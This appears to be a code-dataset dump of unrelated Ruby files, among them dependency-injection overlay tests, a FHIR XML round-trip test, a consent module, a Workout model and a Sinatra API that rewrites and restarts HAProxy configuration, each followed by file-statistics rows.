    assembly = Alki.create_assembly do
      service :svc do
        :test
      end
      overlay :svc, :test_overlay
      # The factory builds the overlay callable on demand.
      factory :test_overlay do
        ->(value) {values << value; :transformed}
      end
    end
    assembly.new.svc.must_equal :transformed
    values.must_equal [:test]
  end
  it 'should allow setting an overlay on groups of services' do
    values = []
    assembly = Alki.create_assembly do
      service :svc do
        :test
      end
      group :svcs do
        service :one do
          :svc_one
        end
        service :two do
          :svc_two
        end
      end
      # Targeting a group wraps every service inside it; :svc (outside the
      # group) is unaffected.
      overlay :svcs, :test_overlay
      set :test_overlay, ->(value) {values << value; "overlay_#{value}".to_sym}
    end
    obj = assembly.new
    obj.svc.must_equal :test
    obj.svcs.one.must_equal :overlay_svc_one
    obj.svcs.two.must_equal :overlay_svc_two
    values.must_equal [:svc_one,:svc_two]
  end
  it 'should not apply to non-services' do
    values = []
    assembly = Alki.create_assembly do
      group :vals do
        set :one do
          :val_one
        end
        factory :two do
          ->(v) { "val_two_#{v}".to_sym }
        end
        func :three do
          :val_three
        end
      end
      # Group overlay is declared, but none of the members is a service, so
      # the overlay callable is never invoked (values stays empty).
      overlay :vals, :test_overlay
      set :test_overlay, ->(value) {values << value; "overlay_#{value}".to_sym}
    end
    obj = assembly.new
    obj.vals.one.must_equal :val_one
    obj.vals.two(1).must_equal :val_two_1
    obj.vals.three.must_equal :val_three
    values.must_equal []
  end
  it 'should chain overlays when multiple are set' do
    values = []
    assembly = Alki.create_assembly do
      group :svcs do
        service :svc do
          :test
        end
      end
      # Group-level overlay runs first, then the service-specific one is
      # applied to its output (see `values` ordering below).
      overlay :svcs, :overlay1
      overlay 'svcs.svc', :overlay2
      set :overlay1, ->(value) {values << value; "overlay_#{value}".to_sym}
      set :overlay2, ->(value) {values << value; :transformed}
    end
    obj = assembly.new
    obj.svcs.svc.must_equal :transformed
    values.must_equal [:test,:overlay_test]
  end
  it 'should follow paths when setting overlay targets' do
    values = []
    assembly = Alki.create_assembly do
      service :svc do
        :test
      end
      group :grp do
        # 'assembly.' is an absolute path back to the assembly root.
        overlay 'assembly.svc', :test_overlay
        set :test_overlay, ->(value) {values << value; :transformed}
      end
    end
    obj = assembly.new
    obj.svc.must_equal :transformed
    values.must_equal [:test]
  end
  it 'should raise error if either target or overlay paths are invalid' do
    # Invalid target path: error surfaces lazily, on first resolution.
    assembly = Alki.create_assembly do
      service :svc do
        :test
      end
      overlay :invalid, :test_overlay
      set :test_overlay, ->(value) {:child}
    end
    assert_raises Alki::InvalidPathError do
      assembly.new.svc
    end
    # Invalid overlay path: same lazy failure mode.
    assembly = Alki.create_assembly do
      service :svc do
        :test
      end
      overlay :svc, :invalid
    end
    assert_raises Alki::InvalidPathError do
      assembly.new.svc
    end
  end
  it 'should set overlays through mounted assemblies' do
    # The child reaches "up" into its parent via the 'parent.' path prefix.
    child = Alki.create_assembly do
      service :svc do
        :test
      end
      overlay 'parent.svc', :test_overlay
      set :test_overlay, ->(value) {:child}
    end
    assembly = Alki.create_assembly do
      service :svc do
        :test
      end
      mount :mounted, child
      # The parent reaches "down" into the mounted child.
      overlay 'mounted.svc', :test_overlay
      set :test_overlay, ->(value) {:parent}
    end
    obj = assembly.new
    obj.svc.must_equal :child
    obj.mounted.svc.must_equal :parent
  end
  it 'should set overlays from overrides' do
    child = Alki.create_assembly do
      service :svc1 do
        :test
      end
    end
    assembly = Alki.create_assembly do
      service :svc2 do
        :test
      end
      # Mount-time override block declares an overlay inside the child.
      mount :mounted, child do
        overlay 'svc1', :test_overlay
        set :test_overlay, ->(value) {:parent}
      end
    end
    # Instance-time override block declares an overlay on the parent.
    obj = assembly.new do
      overlay 'svc2', :test_overlay
      set :test_overlay, ->(value) {:child}
    end
    obj.svc2.must_equal :child
    obj.mounted.svc1.must_equal :parent
  end
  it 'should set overlays on overridden elements' do
    child = Alki.create_assembly do
      set :test_overlay, ->(value) {:"#{value}_child"}
      overlay 'svc1', :test_overlay
      service :svc1 do
        :test1
      end
    end
    assembly = Alki.create_assembly do
      group :grp do
        service :svc2 do
          :test2
        end
      end
      overlay 'grp.svc2', :test_overlay
      set :test_overlay, ->(value) {:"#{value}_parent"}
      # svc1 is redefined at mount time; the child's overlay still applies
      # to the overriding definition.
      mount :mounted, child do
        service :svc1 do
          :test12
        end
      end
    end
    # svc2 is redefined at instance time; the parent's overlay still applies.
    obj = assembly.new do
      group :grp do
        service :svc2 do
          :test22
        end
      end
    end
    obj.mounted.svc1.must_equal :test12_child
    obj.grp.svc2.must_equal :test22_parent
  end
  it 'should allow setting overlays on assembly_instance' do
    values = []
    mock = Minitest::Mock.new
    assembly = Alki.create_assembly do
      # :assembly_instance wraps the whole built assembly object, so all
      # element lookups go through the overlay's return value (the mock).
      overlay :assembly_instance, :test_overlay
      set :val, 1
      set :test_overlay, ->(value) {
        values << value
        mock
      }
    end
    mock.expect :val, 2
    assembly.new.val.must_equal 2
    values.size.must_equal 1
    # The overlay received the real assembly instance (whose val is 1).
    values[0].val.must_equal 1
  end
end
| 23.057252 | 79 | 0.606025 |
1c456e4c8d397cd7b018dde7fd2d15c152cf85ee | 4,920 | require_relative '../test_helper'
# Round-trip tests for the FHIR STU3 XML serializer.
#
# For every shipped example XML file, one test checks XML -> model -> XML
# fidelity and another checks XML -> model -> JSON -> model -> XML (i.e. that
# converting through JSON loses nothing).  On failure the produced and
# original documents plus a diff are written under tmp/errors for inspection.
class XmlFormatTest < Test::Unit::TestCase
  ERROR_DIR = File.join('tmp', 'errors', 'XmlFormatTest')
  ERROR_LOSSY_DIR = File.join('tmp', 'errors', 'XmlLossinessTest')
  EXAMPLE_ROOT = File.join('lib', 'fhir_stu3_models', 'examples', 'xml')

  # Matches a complete decimal value ("10", "-3.50", ...).  Anchored with
  # \A..\z so only genuinely numeric attribute values are compared
  # numerically.  (The previous /(\\.[0-9]+)?/ double-escaped the dot, so the
  # fractional part could never match, and the unanchored form treated any
  # string containing a digit as numeric.)
  NUMERIC_VALUE = /\A-?(0|[1-9][0-9]*)(\.[0-9]+)?\z/

  # Automatically generate one test method per example file
  example_files = File.join(EXAMPLE_ROOT, '**', '*.xml')
  raise 'No Examples Found' if Dir[example_files].empty?

  # Create a blank folder for the errors
  FileUtils.rm_rf(ERROR_DIR) if File.directory?(ERROR_DIR)
  FileUtils.mkdir_p ERROR_DIR
  FileUtils.rm_rf(ERROR_LOSSY_DIR) if File.directory?(ERROR_LOSSY_DIR)
  FileUtils.mkdir_p ERROR_LOSSY_DIR

  Dir.glob(example_files).each do |example_file|
    example_name = File.basename(example_file, '.xml')
    define_method("test_xml_format_#{example_name}") do
      run_xml_roundtrip_test(example_file, example_name)
    end
    define_method("test_xml_json_xml_lossiness_#{example_name}") do
      run_xml_json_xml_lossiness_test(example_file, example_name)
    end
  end

  # Parses an example, re-serializes it, and asserts the two XML documents
  # are equivalent (modulo comments, whitespace and trailing zeros).
  def run_xml_roundtrip_test(example_file, example_name)
    input_xml = File.read(example_file)
    resource = FHIR::STU3::Xml.from_xml(input_xml)
    output_xml = resource.to_xml

    input_nodes = Nokogiri::XML(input_xml)
    output_nodes = Nokogiri::XML(output_xml)
    clean_nodes(input_nodes.root)
    clean_nodes(output_nodes.root)

    errors = calculate_errors(input_nodes, output_nodes)
    dump_errors(ERROR_DIR, example_name, errors, output_xml, input_xml) unless errors.empty?
    assert errors.empty?, 'Differences in generated XML vs original'

    # check memory
    before = check_memory
    resource = nil
    wait_for_gc
    after = check_memory
    assert_memory(before, after)
  end

  # Same as the round-trip test, but converts through JSON in the middle to
  # prove the JSON representation is lossless.
  def run_xml_json_xml_lossiness_test(example_file, example_name)
    input_xml = File.read(example_file)
    resource_from_xml = FHIR::STU3::Xml.from_xml(input_xml)
    output_json = resource_from_xml.to_json
    resource_from_json = FHIR::STU3::Json.from_json(output_json)
    output_xml = resource_from_json.to_xml

    input_nodes = Nokogiri::XML(input_xml)
    output_nodes = Nokogiri::XML(output_xml)
    clean_nodes(input_nodes.root)
    clean_nodes(output_nodes.root)

    errors = calculate_errors(input_nodes, output_nodes)
    dump_errors(ERROR_LOSSY_DIR, example_name, errors, output_xml, input_xml) unless errors.empty?
    assert errors.empty?, 'Differences in generated XML vs original'

    # check memory
    before = check_memory
    resource_from_xml = nil
    resource_from_json = nil
    wait_for_gc
    after = check_memory
    assert_memory(before, after)
  end

  # Diffs two parsed documents and returns the differences that matter.
  # Comments, insignificant whitespace and trailing zeros on numeric values
  # (e.g. "1.5" vs "1.50") are not treated as errors.
  def calculate_errors(input_nodes, output_nodes)
    errors = input_nodes.diff(output_nodes, added: true, removed: true).to_a
    errors.keep_if do |error|
      # we do not support the preservation of comments, ignore them
      is_comment = error.last.is_a?(Nokogiri::XML::Comment)
      # we do not care about empty whitespace
      is_empty_text = error.last.is_a?(Nokogiri::XML::Text) && error.last.text.strip == ''
      !(is_comment || is_empty_text)
    end
    # Pair each removal ('-') with the addition ('+') at the same position
    # and drop pairs whose values are numerically equal.
    left, right = errors.partition { |error| error.first == '-' }
    left.each_with_index do |error, index|
      right_error = right[index]
      next if right_error.nil? # unbalanced diff; nothing to pair against

      two_numerics = (error.last.value =~ NUMERIC_VALUE) && (right_error.last.value =~ NUMERIC_VALUE)
      if two_numerics && (error.last.value.to_f == right_error.last.value.to_f)
        errors.delete(error)
        errors.delete(right_error)
      end
    end
    # return the remaining errors
    errors
  end

  # process input to remove leading and trailing newlines and whitespace around text
  def clean_nodes(node)
    node.children.each do |child|
      child.content = child.content.strip if child.is_a?(Nokogiri::XML::Text)
      if child.has_attribute?('value')
        # remove all the children -- these will be primitive extensions which we do not support.
        child.children = ''
      end
      clean_nodes(child) unless child.children.empty?
    end
  end

  private

  # Writes the diff and both documents to +dir+ for post-mortem debugging.
  def dump_errors(dir, example_name, errors, output_xml, input_xml)
    File.open("#{dir}/#{example_name}.err", 'w:UTF-8') { |file| file.write(errors.map { |x| "#{x.first} #{x.last.to_xml}" }.join("\n")) }
    File.open("#{dir}/#{example_name}_PRODUCED.xml", 'w:UTF-8') { |file| file.write(output_xml) }
    File.open("#{dir}/#{example_name}_ORIGINAL.xml", 'w:UTF-8') { |file| file.write(input_xml) }
  end
end
| 37.846154 | 151 | 0.690447 |
2615bd6bda36c281602692ce0185b27af7d635d4 | 717 | class TreeBuilderOpsDiagnostics < TreeBuilderOps
private
def tree_init_options(_tree_name)
{
:open_all => true,
:leaf => "Diagnostics"
}
end
def set_locals_for_render
locals = super
locals.merge!(:autoload => true)
end
def root_options
region = MiqRegion.my_region
title = _("%{product} Region: %{region_description} [%{region}]") % {:region_description => region.description,
:region => region.region,
:product => I18n.t('product.name')}
[title, title, '100/miq_region.png']
end
end
| 29.875 | 120 | 0.504881 |
4a4b0235c2d2c1598309e420f5a64f86d13414e7 | 994 | class Staff::TwentySevenForm
include ActiveModel::Model
attr_accessor :twenty_seven
delegate :persisted?, :save, to: :twenty_seven
def initialize(twenty_seven = nil)
@twenty_seven = twenty_seven
@twenty_seven ||= TwentySeven.new
end
def assign_attributes(params = {})
@params = params
twenty_seven.assign_attributes(twenty_seven_params)
end
private
def twenty_seven_params
@params.require(:twenty_seven).permit(:m_1, :m_2, :m_3, :c_1, :m_4, :m_5, :m_6, :c_2, :m_7, :m_8, :m_9, :c_3, :m_10, :m_11, :m_12, :c_4, :transfer_m_1, :transfer_m_2, :transfer_m_3, :transfer_c_1, :transfer_m_4, :transfer_m_5, :transfer_m_6, :transfer_c_2, :transfer_m_7, :transfer_m_8, :transfer_m_9, :transfer_c_3, :transfer_m_10, :transfer_m_11, :transfer_m_12, :transfer_c_4, :pt_special_1, :pt_special_2, :pt_special_3, :pt_special_4, :pt_special_5, :pt_special_6, :pt_special_7, :pt_special_8, :pt_special_9, :pt_special_10, :pt_special_11, :pt_special_12)
end
end | 47.333333 | 566 | 0.741449 |
2627b34feb13ac6c46a8c290f9be14b89b09fe5e | 3,137 | #-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2021 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
##
# Intended to be used by the AccountController to implement the user consent
# check.
module Accounts::UserConsent
  include ::UserConsentHelper
  # GET action: show the consent form when consent is (re-)required,
  # otherwise continue straight to the next authentication stage.
  def consent
    if consent_required?
      render 'account/consent', locals: { consenting_user: consenting_user }
    else
      consent_finished
    end
  end
  # POST action: records consent when the checkbox was ticked for a known
  # user, otherwise rejects with an error flash.
  def confirm_consent
    user = consenting_user
    if user.present? && consent_param?
      approve_consent!(user)
    else
      reject_consent!
    end
  end
  # True when the instance has consent enabled AND the current user's
  # consent is missing or stale.
  def consent_required?
    # Ensure consent is enabled and a text is provided
    return false unless user_consent_required?
    # Require the user to consent if he hasn't already
    consent_expired?
  end
  # User explicitly declined: show a warning (with a contact hint) and fail
  # the :consent authentication stage.
  def decline_consent
    message = I18n.t('consent.decline_warning_message') + "\n"
    message <<
      if Setting.consent_decline_mail
        I18n.t('consent.contact_this_mail_address', mail_address: Setting.consent_decline_mail)
      else
        I18n.t('consent.contact_your_administrator')
      end
    flash[:error] = message
    redirect_to authentication_stage_failure_path :consent
  end
  # Consent is "expired" when it was never given, or when the admin bumped
  # Setting.consent_time after the user's last consent.
  def consent_expired?
    consented_at = consenting_user.try(:consented_at)
    # Always if the user has not consented
    return true if consented_at.blank?
    # Did not expire if no consent_time set, but user has consented at some point
    return false if Setting.consent_time.blank?
    # Otherwise, expires when consent_time is newer than last consented_at
    consented_at < Setting.consent_time
  end
  # The user mid-authentication; may be nil if the session key is missing.
  def consenting_user
    User.find_by id: session[:authenticated_user_id]
  end
  # Stamps the consent time (skipping validations/callbacks via
  # update_column) and continues the authentication flow.
  # NOTE(review): DateTime.now is legacy Ruby; Time/Time.zone.now is the
  # modern choice — confirm timezone expectations before changing.
  def approve_consent!(user)
    user.update_column(:consented_at, DateTime.now)
    consent_finished
  end
  # Marks the :consent authentication stage as successfully completed.
  def consent_finished
    redirect_to authentication_stage_complete_path(:consent)
  end
  # Consent checkbox missing or user unknown: flash an error and fail the
  # :consent stage.
  def reject_consent!
    flash[:error] = I18n.t('consent.failure_message')
    redirect_to authentication_stage_failure_path :consent
  end
end
| 29.87619 | 95 | 0.744661 |
016e20b528af0cef03570f41db5b8b6adce72bbb | 1,082 | # coding: utf-8
lib_dir = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib_dir) unless $LOAD_PATH.include?(lib_dir)
require 'logfile_interval/version'

# Gem specification for logfile_interval, a logfile parser/aggregator.
Gem::Specification.new do |gem|
  gem.name          = "logfile_interval"
  gem.version       = LogfileInterval::VERSION
  gem.authors       = ["Philippe Le Rohellec"]
  gem.email         = ["[email protected]"]
  gem.summary       = "Aggregate logfile data into intervals"
  gem.description   = "Logfile parser and aggregator"
  gem.homepage      = "https://github.com/plerohellec/logfile_interval"
  gem.license       = "MIT"

  # Package everything tracked by git; pick executables and specs out of it.
  gem.files         = `git ls-files`.split($/)
  gem.executables   = gem.files.grep(%r{^bin/}) { |f| File.basename(f) }
  gem.test_files    = gem.files.grep(%r{^spec/})
  gem.require_paths = ["lib"]

  gem.add_development_dependency "bundler", "~> 1.3"
  gem.add_development_dependency "byebug", [">= 0"] if RUBY_VERSION >= '2.0.0'
  gem.add_development_dependency "rspec", ["~> 2.14.0"]
  gem.add_development_dependency "rake"
  gem.add_development_dependency "simplecov"
end
| 40.074074 | 79 | 0.680222 |
21decd3d45957c6ff7496640c95c296b72e821a0 | 4,616 | class Workout < ActiveRecord::Base
attr_accessor :intensity
belongs_to :log_entry
has_many :completed_workouts, :dependent => :destroy
has_many :planned_workouts, :dependent => :destroy
has_many :messages, :dependent => :destroy
accepts_nested_attributes_for :completed_workouts
accepts_nested_attributes_for :planned_workouts
accepts_nested_attributes_for :messages
default_scope {order('time ASC', 'id ASC')}
amoeba do
enable
end
def is_empty_workout
empty = true
if self.messages.size > 0
empty = false
end
self.completed_workouts.each do |completed_workout|
if completed_workout.summary != nil || completed_workout.workout_times.size > 0
empty = false
end
end
self.planned_workouts.each do |planned_workout|
if planned_workout.instructions != "" || planned_workout.planned_workout_times.size > 0
empty = false
end
end
return empty
end
def total_completed_zones
zones = {}
if self.completed_workouts.first != nil
self.completed_workouts.first.workout_times.each do |workout_time|
if zones[workout_time.zone] == nil
zones[workout_time.zone] = workout_time.duration
else
zones[workout_time.zone] = zones[workout_time.zone] += workout_time.duration
end
end
end
return zones
end
def total_planned_zones
zones = {}
if self.planned_workouts.first != nil
self.planned_workouts.first.planned_workout_times.each do |workout_time|
if zones[workout_time.zone] == nil
zones[workout_time.zone] = workout_time.duration
else
zones[workout_time.zone] = zones[workout_time.zone] += workout_time.duration
end
end
end
return zones
end
def has_intensity
intensity = false
unless self.completed_workouts.first == nil
if self.completed_workouts.first.workout_times.where('zone > ?', 1).size > 0
intensity = true
else
intensity = false
end
end
unless self.planned_workouts.first == nil
if self.planned_workouts.first.planned_workout_times.where('zone > ?', 1).size > 0
intensity = true
end
end
return intensity
end
def self.total_completed(id)
total = 0
entry = Workout.find(id)
entry.completed_workouts.each do |workout|
workout.workout_times.each do |time|
total += time.duration
end
end
return total
end
def total_completed
total = 0
self.completed_workouts.each do |workout|
workout.workout_times.each do |time|
unless time.duration == nil
total += time.duration
end
end
end
return total
end
def total_planned
total = 0
self.planned_workouts.each do |planned_workout|
planned_workout.planned_workout_times.each do |time|
unless time.duration == nil
total += time.duration
end
end
end
return total
end
def self.total_planned(id) #find where used and change syntax
total = 0
entry = Workout.find(id)
entry.planned_workouts.each do |planned_workout|
planned_workout.planned_workout_times.each do |time|
total += time.duration
end
end
return total
end
def self.instructions(id)
entry = Workout.find(id)
instructions = entry.planned_workouts.first.instructions
return instructions
end
def self.intensities(id)
entry = Workout.find(id)
intensities = entry.completed_workouts.first.workout_times.where('zone > ?', 1)
return intensities
end
def self.planned_intensities(id)
entry = Workout.find(id)
intensities = entry.planned_workouts.first.planned_workout_times.where('zone > ?', 1)
return intensities
end
#fix AM PM to integer
def self.convert_am_pm
Workout.all.each do |workout|
if workout.time_of_day == "AM"
workout.time = 1
elsif workout.time_of_day == "PM"
workout.time = 2
else
workout.time = 1
end
workout.save
end
end
#calculate effort level
def effort_level
total_compeleted = self.total_completed
total_planned = self.total_planned
if total_completed == 0
total_time = total_planned
else
total_time = total_compeleted
end
short_workout = 0
long_workout = 14400
if total_time <= short_workout
percentage = 0
elsif total_time >= long_workout
percentage = 100
else
percentage = ((total_time - short_workout).to_f/(long_workout - short_workout).to_f*100).to_i
end
return percentage
return total_zones
end
end
| 26.377143 | 99 | 0.678293 |
874d5fd410898f1b26d3d7d131a3681e348b4c0a | 1,575 | require_relative '../test_helper'
# Exercises the shared CRUD behaviour of the controller stub: each action
# must build the model object, invoke the matching model method with the
# request params, and respond with the returned object.
class ControllerTest < MiniTest::Test
  def setup
    @controller = ControllerStub.new
    @controller.current_user = :someone
    @controller.params = {id: 1, name: 'Hello'}
  end

  def test_create
    assert_controller_action(:create, [@controller.params], 'created')
  end

  def test_update
    assert_controller_action(:update, [@controller.params], 'updated')
  end

  def test_destroy
    # destroy takes no arguments on the model
    assert_controller_action(:destroy, [], 'destroyed')
  end

  def test_exception_handling
    e = ActiveRecord::RecordInvalid.new(ModelStubInvalid.new)
    @controller.send(:render_invalid, e)
    assert_equal(:unprocessable_entity, @controller.rendered[:status])
    assert(@controller.rendered[:text].include?('Error'))
  end

  private

  # Drives one controller action against a mocked model:
  # the mock expects +action+ to be called with +expected_args+, and the
  # controller must respond with the object the model returned.
  def assert_controller_action(action, expected_args, verb)
    obj = Minitest::Mock.new
    obj.expect(action, obj, expected_args)
    ModelStubAction.stub :new, obj do
      @controller.public_send(action)
    end
    obj.verify
    assert(@controller.responded_with === obj,
           "Controller should respond with #{verb} object")
  end
end
01724caa6976e3415fec7a4d6e0060072a03e7d0 | 839 | # encoding: utf-8
require 'faraday'
require 'bitbucket_rest_api/error'
module BitBucket
  # Faraday response middleware that maps HTTP error statuses returned by the
  # BitBucket API onto the matching BitBucket::Error exception.  Statuses in
  # 400...600 without a dedicated class fall back to ServiceError; anything
  # below 400 passes through untouched.
  class Response::RaiseError < Faraday::Response::Middleware
    def on_complete(env)
      status = env[:status].to_i
      error_class =
        case status
        when 400 then BitBucket::Error::BadRequest
        when 401 then BitBucket::Error::Unauthorized
        when 403 then BitBucket::Error::Forbidden
        when 404 then BitBucket::Error::NotFound
        when 422 then BitBucket::Error::UnprocessableEntity
        when 500 then BitBucket::Error::InternalServerError
        when 503 then BitBucket::Error::ServiceUnavailable
        when 400...600 then BitBucket::Error::ServiceError
        end
      raise error_class.new(env) if error_class
    end
  end # Response::RaiseError
end # BitBucket
| 26.21875 | 60 | 0.665077 |
f8ebcb060c14063382ae320c386aa5b8c03efe5d | 600 | require 'httparty'
require 'hashie'
module SgDeliverySlotChecker
  module Stores
    # Checks giant.sg for an available home-delivery slot for a postal code.
    class Giant
      def initialize(postal_code:)
        @postal_code = postal_code
      end

      # True when at least one delivery slot is currently bookable.
      def available?
        get_availability
      end

      private

      attr_reader :postal_code

      # Posts the postal code to Giant's cart endpoint and scans the parsed
      # JSON (at any nesting depth) for an "available" => true flag.
      def get_availability
        slots = HTTParty.post(
          "https://giant.sg/checkout/cart/checkdelivery",
          body: { postal_code: postal_code }
        ).parsed_response
        slots.extend(Hashie::Extensions::DeepFind)
        slots.deep_find_all("available").any?(true)
      end
    end
  end
end
| 20 | 116 | 0.661667 |
38208361c745416a3fa98e44baf20c77d442c373 | 6,496 | require 'sinatra'
require 'json'
require 'webrick'
require 'webrick/https'
require 'openssl'
# TLS certificate/key directory; required to serve HTTPS.
# Fixed: File.exists? was removed in Ruby 3.2 — use File.exist?; path built
# with File.join for consistency with the rest of the script.
CERT_PATH = ENV['CERT_PATH']
if CERT_PATH.nil? || !File.exist?(File.join(CERT_PATH, 'hapi.crt'))
  puts "set CERT_PATH env var to where your hapi.crt and hapi.key are"
  exit 1
end

# WEBrick options: HTTPS on 0.0.0.0:443 with the hapi.crt/hapi.key pair.
webrick_options = {
  :Host => "0.0.0.0",
  :Port => 443,
  :Logger => WEBrick::Log::new($stderr, WEBrick::Log::DEBUG),
  :DocumentRoot => "/ruby/htdocs",
  :SSLEnable => true,
  :SSLVerifyClient => OpenSSL::SSL::VERIFY_NONE,
  :SSLCertificate => OpenSSL::X509::Certificate.new( File.open(File.join(CERT_PATH, "/hapi.crt")).read),
  :SSLPrivateKey => OpenSSL::PKey::RSA.new( File.open(File.join(CERT_PATH, "/hapi.key")).read),
  :SSLCertName => [ [ "CN",WEBrick::Utils::getservername ] ]
}
# REST API for managing the generated section of an haproxy config.
#
# API-managed frontends/backends are persisted as JSON in a sidecar file;
# every change re-renders haproxy.cfg (preserving the hand-maintained part
# outside the HAPROXY_API_GENERATED markers), validates it with
# `haproxy -c`, and restarts haproxy — rolling back on validation failure.
#
# Fixed: File.exists? (removed in Ruby 3.2) -> File.exist?; exit-status
# check uses $?.success? instead of the raw wait status.
class HaproxyApi < Sinatra::Base
  # Live haproxy config path; overridable for dev/test via HAPROXY_CONFIG.
  $haproxy_config = '/etc/haproxy/haproxy.cfg'
  if ENV['HAPROXY_CONFIG']
    $haproxy_config = ENV['HAPROXY_CONFIG']
  end
  # JSON sidecar holding the API-managed state.
  $mutable_haproxy_config = $haproxy_config + '.haproxy-api.json'

  # Loads the API-managed state; empty structure when none exists yet.
  def get_config
    return { 'frontend' => {}, 'backend' => {} } unless File.exist?($mutable_haproxy_config)
    JSON.parse(File.read($mutable_haproxy_config))
  end

  # Renders the full haproxy.cfg text: the hand-maintained portion of the
  # existing file is kept verbatim, and everything between the
  # HAPROXY_API_GENERATED markers is regenerated from +config+.
  def render(config)
    content = ""
    f = File.open($haproxy_config, "r")
    in_gen_section = false
    f.each_line do |line|
      if line =~ /HAPROXY_API_GENERATED/
        # Marker lines toggle the "inside generated section" state.
        if in_gen_section
          in_gen_section = false
        else
          in_gen_section = true
        end
      else
        if !in_gen_section
          content += line
        end
      end
    end
    f.close
    content += "# HAPROXY_API_GENERATED - START\n"
    config['frontend'].each_pair do |name, frontend|
      content += "frontend #{name}\n"
      content += " bind 0.0.0.0:#{frontend['port']}\n"
      if frontend.has_key? 'acls'
        # Path-prefix ACLs route to per-port backends; the last ACL's port
        # also becomes the default backend.
        port = ''
        frontend['acls'].each_pair do |acl,backend_port|
          clean_name = acl.gsub('/','_')
          content += " acl url_#{clean_name} path_beg #{acl}\n"
          content += " use_backend #{name}-#{backend_port}-backend if url_#{clean_name}\n"
          port = backend_port
        end
        content += " default_backend #{name}-#{port}-backend\n"
      else
        content += " default_backend #{name}-backend\n"
      end
      content += "\n"
    end
    config['backend'].each_pair do |name, backend|
      content += "backend #{name}\n"
      content += " balance #{backend['lbmethod']}\n"
      if backend.has_key?('options')
        backend['options'].each_pair do |k,v|
          content += " option #{k} #{v}\n"
        end
      end
      port = backend['port']
      server_options = ""
      if backend.has_key?('server_options')
        backend['server_options'].each_pair do |k,v|
          server_options += "#{k} #{v} "
        end
      end
      backend['servers'].each do |server|
        content += " server #{server}:#{port} #{server}:#{port} #{server_options} \n"
      end
      content += "\n"
    end
    content += "# HAPROXY_API_GENERATED - END\n"
    return content
  end

  # Persists +config+: backs up haproxy.cfg, writes the JSON sidecar and the
  # rendered config, validates with `haproxy -c`, then restarts haproxy.
  # On validation failure the backup is restored and a 500 is returned.
  def set_config(config)
    ts = Time.now.to_i
    `cp #{$haproxy_config} #{$haproxy_config}.#{ts}`
    content = render config
    File.open($mutable_haproxy_config, 'w') { |file| file.write(JSON.dump(config)) }
    File.open($haproxy_config, 'w') { |file| file.write(content) }
    result = `/usr/sbin/haproxy -c -f #{$haproxy_config}`
    if $?.success?
      puts `systemctl restart haproxy`
    else
      puts "rolling back config - got:"
      puts result
      `cp #{$haproxy_config}.#{ts} #{$haproxy_config}`
      return status(500)
    end
  end

  # Registers an ACL (path prefix -> backend port) on a frontend.  When the
  # frontend already exists in +config+ the ACL is added to the stored copy,
  # otherwise to the freshly posted +frontend+ hash.
  def add_acl ( frontend, id, config )
    acl = frontend['acl']
    backend_port = frontend['backend_port']
    if config.has_key?('frontend') && config['frontend'].has_key?(id)
      frontend = config['frontend'][id]
    end
    if !frontend.has_key?('acls')
      frontend['acls'] = {}
    end
    frontend['acls'][acl] = backend_port
  end

  # Debug endpoint: the haproxy.cfg text that would be written.
  get '/render' do
    config = get_config
    render config
  end

  get '/frontends' do
    config = get_config
    JSON.dump(config['frontend'])
  end

  get '/frontend/:id' do
    config = get_config
    id = params[:id]
    return status(404) if !config['frontend'].has_key?(id)
    JSON.dump(config['frontend'][id])
  end

  # Create a frontend; 500 when it already exists (use PUT to modify).
  post '/frontend/:id' do
    config = get_config
    id = params[:id]
    if config['frontend'].has_key?(id)
      puts "#{id} already exists - use put"
      return status(500)
    end
    frontend = JSON.parse request.body.read
    if frontend.has_key? 'acl'
      add_acl frontend, id, config
    end
    config['frontend'][id] = frontend
    set_config config
    JSON.dump(frontend)
  end

  # Replace a frontend, or just add an ACL when the payload carries one.
  put '/frontend/:id' do
    config = get_config
    id = params[:id]
    frontend = JSON.parse request.body.read
    if frontend.has_key? 'acl'
      add_acl frontend, id, config
    else
      config['frontend'][id] = frontend
    end
    set_config config
    JSON.dump(frontend)
  end

  delete '/frontend/:id' do
    config = get_config
    config['frontend'].delete params[:id]
    set_config config
  end

  get '/backends' do
    config = get_config
    JSON.dump(config['backend'])
  end

  get '/backend/:id' do
    config = get_config
    id = params[:id] + "-backend"
    return status(404) if !config['backend'].has_key?(id)
    JSON.dump(config['backend'][id])
  end

  # Create a backend.  ACL-backed backends are keyed per port
  # ("<id>-<port>-backend") to match the names render() emits.
  post '/backend/:id' do
    config = get_config
    backend = JSON.parse request.body.read
    if backend.has_key?('acl')
      id = params[:id] + '-' + backend['port'] + "-backend"
    else
      id = params[:id] + "-backend"
    end
    if config['backend'].has_key?(id)
      puts "#{id} already exists - use put"
      return status(500)
    end
    config['backend'][id] = backend
    set_config config
    JSON.dump(backend)
  end

  put '/backend/:id' do
    config = get_config
    id = params[:id] + "-backend"
    backend = JSON.parse request.body.read
    config['backend'][id] = backend
    set_config config
    JSON.dump(backend)
  end

  delete '/backend/:id' do
    config = get_config
    config['backend'].delete(params[:id] + "-backend")
    set_config config
  end
end
# Boot the API under WEBrick using the TLS options assembled above.
Rack::Handler::WEBrick.run HaproxyApi, webrick_options
| 25.47451 | 112 | 0.581589 |
1ccad11ef8827966c97c32c2a5c188de52af5068 | 1,245 | # coding: utf-8
bigdecimal_version = '1.3.5'

# Gem specification for the bigdecimal arbitrary-precision decimal library.
Gem::Specification.new do |spec|
  spec.name    = "bigdecimal"
  spec.version = bigdecimal_version
  spec.authors = ["Kenta Murata", "Zachary Scott", "Shigeo Kobayashi"]
  spec.email   = ["[email protected]"]

  spec.summary     = "Arbitrary-precision decimal floating-point number library."
  spec.description = "This library provides arbitrary-precision decimal floating-point number class."
